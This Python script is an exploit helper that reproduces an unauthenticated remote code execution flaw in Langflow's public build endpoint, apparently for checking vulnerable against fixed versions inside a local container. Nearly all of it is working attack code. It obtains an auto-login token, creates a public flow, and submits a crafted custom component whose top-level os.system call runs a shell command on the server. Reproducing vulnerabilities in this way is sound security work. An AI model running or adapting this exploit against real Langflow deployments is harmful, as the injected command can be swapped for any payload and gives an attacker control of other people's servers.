#!/usr/bin/env python3
"""CVE-2026-33017 exploit helper - runs INSIDE the langflow container.

Invoked by reproduction_steps.sh via:
    docker exec -e ROLE=<role> -e TOKEN=<token> -e PROOF_TAG=<tag> <container> python3 /tmp/repro_attempt.py

Performs the full unauthenticated-RCE flow against the local langflow server
(http://127.0.0.1:7860):
  1. Wait for /health
  2. GET /api/v1/auto_login  -> access_token (AUTO_LOGIN=true)
  3. POST /api/v1/flows/      -> create a PUBLIC flow (id)
  4. POST /api/v1/build_public_tmp/{flow_id}/flow  with Cookie client_id + a
     custom component whose top-level code runs os.system() to drop a proof file
  5. Poll for the proof file and emit a JSON result on stdout.

On vulnerable langflow (<1.9.0) the attacker-supplied `data` is passed to
start_flow_build() and the custom component code is exec()'d via
prepare_global_scope()/create_class() at graph-build time, so the proof file is
written. On fixed langflow (>=1.9.0) the endpoint hardcodes data=None and loads
the stored (benign) flow from the database, so no attacker code runs.
"""
import json
import os
import sys
import time
import urllib.error
import urllib.request

# Base URL of the langflow server; every request path is appended to this.
BASE = "http://127.0.0.1:7860"
# Per-run marker taken from the TOKEN env var (default "repro"). It is embedded
# in the flow name, the client_id cookie and the proof file, and main() checks
# for it in the proof file to decide success.
# NOTE(review): the invocation shown in the module docstring also passes
# PROOF_TAG, but nothing in this file reads it.
TOKEN = os.environ.get("TOKEN", "repro")
# Label taken from the ROLE env var (default "vuln"); only echoed back in the
# JSON result, it does not change what the script does.
ROLE = os.environ.get("ROLE", "vuln")
# Path of the proof file that main() removes up front and polls for afterwards.
PROOF = "/tmp/rce-proof"


def req(method, path, headers=None, body=None, timeout=30):
    """Send one HTTP request to the local server and return ``(status, text)``.

    Args:
        method: HTTP verb, e.g. ``"GET"`` or ``"POST"``.
        path: Request path, appended verbatim to ``BASE``.
        headers: Optional dict of request headers.
        body: Optional JSON-serialisable object; ``None`` sends no request body.
        timeout: Socket timeout in seconds handed to ``urlopen``.

    Returns:
        A ``(status, text)`` tuple. Responses with an HTTP error status come
        back with their real status code and decoded body. Any failure that
        yields no usable HTTP response (connection refused, timeout, reset,
        malformed reply) is reported as status ``0`` with the exception text,
        so callers only ever have to inspect the status code.
    """
    # Local import: only needed for the exception type caught below.
    import http.client

    url = BASE + path
    data = json.dumps(body).encode("utf-8") if body is not None else None
    r = urllib.request.Request(url, data=data, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(r, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        # Must precede the OSError clause: HTTPError is a URLError, which is
        # itself an OSError, and here we still have a real status and body.
        return e.code, e.read().decode("utf-8", "replace")
    except (OSError, http.client.HTTPException) as e:
        # URLError is covered by OSError. Read timeouts, connection resets and
        # http.client errors (e.g. RemoteDisconnected while the server is still
        # starting) are not wrapped in URLError by urlopen, so catch them too.
        return 0, str(e)


def wait_health(timeout=240):
    """Poll ``GET /health`` until it answers 200 or ``timeout`` seconds elapse.

    Args:
        timeout: Maximum time to keep polling, in seconds. A value of zero or
            less returns ``False`` without issuing any request.

    Returns:
        ``True`` as soon as a probe returns HTTP 200, ``False`` if the deadline
        passes first.
    """
    # Monotonic clock: the deadline must not move if the wall clock is adjusted
    # while we are waiting.
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            st, _ = req("GET", "/health", timeout=10)
        except Exception:
            # Deliberate best-effort: any failure while probing just means
            # "not healthy yet", so retry until the deadline.
            st = 0
        if st == 200:
            return True
        time.sleep(2)
    return False


def make_malicious_flow(token):
    """Build a flow with one CustomComponent node carrying an os.system payload.

    The top-level assignment `_rce = os.system(...)` is an ast.Assign node which
    prepare_global_scope() collects and exec()'s at graph-build time.

    Args:
        token: Marker string written into the proof file after the literal
            `RCE_CONFIRMED `.

    Returns:
        A dict of the form `{"nodes": [node], "edges": []}` holding the single
        custom-component node and no edges.
    """
    # Source text of the custom component. PROOF and `token` are interpolated
    # into the shell command without any escaping.
    # NOTE(review): assumes token contains no quotes or shell metacharacters --
    # confirm against whatever generates TOKEN.
    # The command writes `id` output to PROOF first and only then appends the
    # RCE_CONFIRMED line, so the file can briefly exist without the token.
    code = (
        "from langflow.custom import Component\n"
        "from langflow.io import MessageTextInput, Output\n"
        "from langflow.schema import Data\n"
        "import os\n"
        f"_rce = os.system(\"id > {PROOF} 2>&1 && echo 'RCE_CONFIRMED {token}' >> {PROOF}\")\n"
        "\n"
        "class RCEComponent(Component):\n"
        '    display_name = "RCE Component"\n'
        '    description = "demo"\n'
        '    icon = "custom_components"\n'
        "    inputs = [MessageTextInput(name=\"input_value\", display_name=\"Input\")]\n"
        "    outputs = [Output(display_name=\"Output\", name=\"output\", method=\"build_output\")]\n"
        "    def build_output(self) -> Data:\n"
        "        return Data(value=self.input_value)\n"
    )
    # Node description wrapping `code`.
    # NOTE(review): the field set presumably mirrors what the langflow frontend
    # serialises for a custom component -- verify against the targeted version.
    node = {
        "id": "CustomComponent-rce-1",
        "type": "CustomComponent",
        "data": {
            "id": "CustomComponent-rce-1",
            "type": "RCEComponent",
            "node": {
                "base_classes": ["Data"],
                "display_name": "RCE Component",
                "description": "demo",
                "icon": "custom_components",
                "outputs": [
                    {
                        "display_name": "Output",
                        "name": "output",
                        "method": "build_output",
                        "types": ["Data"],
                        "cache": True,
                        "allows_loop": False,
                        "group_outputs": False,
                        "hidden": None,
                        "loop_types": None,
                        "options": None,
                        "required_inputs": None,
                        "selected": "Data",
                        "tool_mode": False,
                        "value": "__UNDEFINED__",
                    }
                ],
                "template": {
                    "_type": "Component",
                    # The component source travels in the template's "code" field.
                    "code": {
                        "type": "code",
                        "value": code,
                        "required": True,
                        "dynamic": True,
                        "show": True,
                        "advanced": True,
                        "multiline": True,
                        "name": "code",
                        "display_name": "Code",
                    },
                    # Value for the component's single declared input.
                    "input_value": {
                        "_input_type": "MessageTextInput",
                        "type": "str",
                        "name": "input_value",
                        "display_name": "Input",
                        "value": "hello",
                        "required": False,
                        "show": True,
                    },
                },
            },
        },
    }
    return {"nodes": [node], "edges": []}


def _emit_failure(result, message):
    """Record ``message`` as the error, print the JSON result and exit with 1."""
    result["error"] = message
    print(json.dumps(result))
    sys.exit(1)


def _json_field(body, key):
    """Return ``key`` from a JSON-object response body, or ``None``.

    ``None`` is returned when the body is not valid JSON, is not a JSON object,
    or does not contain ``key``.
    """
    try:
        parsed = json.loads(body)
    except ValueError:
        return None
    if not isinstance(parsed, dict):
        return None
    return parsed.get(key)


def _read_proof():
    """Return the stripped text of the proof file, or ``None`` if it is absent."""
    try:
        with open(PROOF, encoding="utf-8", errors="replace") as fh:
            return fh.read().strip()
    except FileNotFoundError:
        return None


def main():
    """Run the reproduction flow and print exactly one JSON result on stdout.

    Steps: remove any stale proof file, wait for the server to be healthy,
    obtain a token from auto_login, create a PUBLIC flow, POST the crafted flow
    data to the public build endpoint, then poll for the proof file.

    The process exits with status 0 only when the proof file exists and
    contains ``TOKEN``. Every other outcome prints the result collected so far
    (with ``error`` set for setup failures) and exits with status 1.
    """
    result = {"role": ROLE, "token": TOKEN, "endpoint": "public", "error": None}

    # Start from a clean slate so a proof left by an earlier run cannot be
    # mistaken for this run's result.
    try:
        os.remove(PROOF)
    except FileNotFoundError:
        pass
    except OSError as exc:
        _emit_failure(result, f"cannot remove stale proof file: {exc}")

    if not wait_health():
        _emit_failure(result, "health check failed")
    result["healthcheck_passed"] = True

    # 1. unauthenticated auto-login (AUTO_LOGIN=true issues a superuser session)
    st, body = req("GET", "/api/v1/auto_login")
    result["auto_login_status"] = st
    if st != 200:
        _emit_failure(result, f"auto_login failed: {body[:200]}")
    access_token = _json_field(body, "access_token")
    if not access_token:
        _emit_failure(result, "no access_token in auto_login response")
    result["access_token"] = True
    auth = {"Authorization": f"Bearer {access_token}", "Content-Type": "application/json"}

    # 2. create a PUBLIC flow so build_public_tmp accepts it. The stored data is
    #    benign and unused on the vulnerable path (attacker `data` overrides it).
    flow_body = {"name": f"exploit-flow-{TOKEN}", "data": {"nodes": [], "edges": []}, "access_type": "PUBLIC"}
    st, body = req("POST", "/api/v1/flows/", headers=auth, body=flow_body)
    result["create_flow_status"] = st
    if st not in (200, 201):
        _emit_failure(result, f"create_flow failed: {body[:300]}")
    flow_id = _json_field(body, "id")
    if not flow_id:
        _emit_failure(result, f"no flow id: {body[:300]}")
    result["flow_id"] = flow_id

    # 3. exploit: unauthenticated POST to the public build endpoint with attacker
    #    `data` carrying the malicious custom component + a client_id cookie.
    malicious = make_malicious_flow(TOKEN)
    exploit_headers = {"Content-Type": "application/json", "Cookie": f"client_id={TOKEN}"}
    st, body = req("POST", f"/api/v1/build_public_tmp/{flow_id}/flow", headers=exploit_headers, body={"data": malicious})
    result["exploit_status"] = st
    result["exploit_body"] = body[:500]

    # 4. poll for the proof file written by os.system() inside the container.
    #    The payload creates the file first and appends the token line later,
    #    so keep polling until the token is visible rather than stopping at the
    #    first sighting of a possibly half-written file.
    proof_exists = False
    proof_content = None
    for _ in range(25):
        content = _read_proof()
        if content is not None:
            proof_exists = True
            proof_content = content
            if TOKEN in content:
                break
        time.sleep(1)
    result["proof_exists"] = proof_exists
    result["proof_content"] = proof_content
    result["success"] = bool(proof_exists and TOKEN in (proof_content or ""))
    print(json.dumps(result))
    sys.exit(0 if result["success"] else 1)


# Run the flow only when executed as a script; main() always ends via sys.exit().
if __name__ == "__main__":
    main()
